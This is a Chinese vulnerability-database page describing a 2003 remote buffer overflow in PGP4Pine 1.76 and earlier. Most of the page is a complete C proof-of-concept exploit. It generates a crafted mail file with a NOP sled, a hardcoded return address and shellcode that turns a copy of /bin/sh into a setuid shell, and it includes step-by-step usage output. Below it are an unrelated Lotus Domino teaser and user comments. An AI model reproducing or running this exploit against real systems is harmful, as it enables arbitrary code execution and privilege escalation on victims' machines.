PGP4Pine 1.75.6/1.76 – ‘Message Line’ Remote Buffer Overflow
漏洞ID | 1053754 | 漏洞类型 | |
发布时间 | 2003-03-12 | 更新时间 | 2003-03-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7071/info
A vulnerability has been discovered in PGP4Pine. The problem occurs when parsing an email message for PGP data. Due to insufficient bounds checking, when processing lines of excessive length, a buffer may be overrun. This would result in sensitive locations in memory being overwritten with data supplied in the message.
Successful exploitation of this issue may allow a remote attacker to execute arbitrary commands on a target system. All instructions executed would be run with the privileges of the users running the software.
This issue affects pgp4pine version 1.76 and earlier.
/*
* mailex-gen.c -- PGP4Pine exploit mail generator - proof of concept
* Copyright (C) 2003 - Eric AUGE
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2 of
* the License or (at your option) any later version.
*
* This program is distributed in the hope that it will be
* useful, but WITHOUT ANY WARRANTY; without even the implied
* warranty
* of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
* 02111-1307
* USA
*
* how poc code works :
* $ cp /bin/sh /tmp/sh
* $ ls -l /tmp/sh
* -rwxr-x--- 1 rival users 680304 Mar 12 15:17 /tmp/sh
* $ ./mailex-gen
* eip (i use readline[] addr): 0xbfffdbd0
* now type: /path/to/pgp4pine-vuln -d -i ./mailme
* $ /path/to/pgp4pine-vuln -d -i ./mailme
* $ ls -l /tmp/sh
* -rwsr-xr-x 1 rival users 680304 Mar 12 15:17 /tmp/sh
*
*
* Eric AUGE <[email protected]>
*
*/
/*
* NOTE: EIP is hardcoded regarding my own system and tests,
* tune it for your needs ;)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define MAXLINESIZE 301
#define SAVED_EIP 0xbfffdbd0
#define NOP 0x90
#define ALIGN 0
#define XFILE "mailme"
/* quick made chown 4755 /tmp/sh */
unsigned char shellcode[] =
"xebx14x31xc0x34x0fx5bx31xc9x66xb9xedx09xcdx80"
"x31xc0x40x89xc3xcdx80xe8xe7xffxffxff/tmp/sh";
int main(int argc, char **argv) {
int i,_sc_size,fd;
unsigned char buffer[MAXLINESIZE] = " ";
long *ptr;
char *cptr;
_sc_size = sizeof(shellcode);
ptr = (long *) &buffer;
fprintf(stderr,"eip (i use readline[] addr): %pn", SAVED_EIP);
for (i = 0; i < MAXLINESIZE ; i += 4) {
*ptr++ = SAVED_EIP;
}
cptr = (char *) &buffer;
cptr = cptr + MAXLINESIZE - 45 - _sc_size;
for ( i = 0; i < _sc_size ; i++ )
*cptr++ = shellcode[i];
for ( cptr = (char *) &buffer ; cptr < ((char *)buffer + MAXLINESIZE - 45 - _sc_size) ; cptr++)
*cptr = NOP;
/* now lets create the file */
if ( (fd = open(XFILE, O_CREAT|O_WRONLY|O_TRUNC, S_IRWXU|S_IRGRP|S_IROTH)) == -1) {
fprintf (stderr,"open() failed!n");
exit(1);
}
write(fd,&buffer,sizeof(buffer));
close(fd);
fprintf(stderr,"now type: /path/to/pgp4pine-vuln -d -i ./mailmen");
return (0);
}
Lotus Domino服务拒绝漏洞 漏洞ID 1205481 漏洞类型 未知 发布时间 2001-08-02 更新时间 2001-08-02 CVE编号 CVE-2001-0600 CNNVD-ID CNNVD-200108-016 漏洞平台 N/A CVS…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666